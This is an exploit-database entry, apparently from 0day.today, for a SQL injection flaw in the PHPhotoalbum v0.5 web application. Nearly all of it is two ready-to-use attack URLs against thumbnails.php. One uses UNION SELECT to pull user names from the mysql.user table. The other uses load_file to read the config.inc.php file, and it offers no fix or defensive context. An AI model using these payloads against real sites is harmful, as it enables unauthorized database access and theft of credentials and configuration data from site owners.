id: 10349
date: 12/21/2009
title: PHPhotoalbum v0.5 SQL Injection Vulnerability
author: Stack
cves: 

=============================================
PHPhotoalbum v0.5 SQL Injection Vulnerability
=============================================

# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows
 
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--
 
 
 
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--



#  0day.today [2023-03-26]  #